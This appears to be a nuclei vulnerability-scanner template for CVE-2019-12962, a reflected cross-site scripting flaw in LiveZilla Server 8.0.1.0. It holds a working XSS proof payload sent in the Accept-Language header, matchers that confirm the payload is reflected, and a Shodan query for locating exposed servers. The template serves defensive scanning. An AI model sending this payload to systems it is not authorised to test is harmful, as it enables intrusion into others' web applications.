nuclei-templates/http/cves/2019/CVE-2019-12962.yaml

55 lines
1.7 KiB
YAML

id: CVE-2019-12962
info:
name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting
author: Clment Cruchet
severity: medium
description: |
LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.
remediation: |
Upgrade to the latest version of LiveZilla Server or apply the vendor-provided patch to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/49669
- https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/
- http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-12962
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-12962
cwe-id: CWE-79
epss-score: 0.20689
epss-percentile: 0.95892
cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: livezilla
product: livezilla
shodan-query: http.html:LiveZilla
tags: xss,edb,packetstorm,cve,cve2019,livezilla
http:
- method: GET
path:
- '{{BaseURL}}/mobile/index.php'
headers:
Accept-Language: ';alert(document.domain)//'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "var detectedLanguage = ';alert(document.domain)//';"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a00463044022025e4fe54cecc087a99ca7d823016382ec82540597c5f0944eea5e5e9ea5890740220441ac005601f87f844eaed2a3895e48a77486bd4e203a6ffaa7c72b8de127743:922c64590222798bb761d5b6d8e72950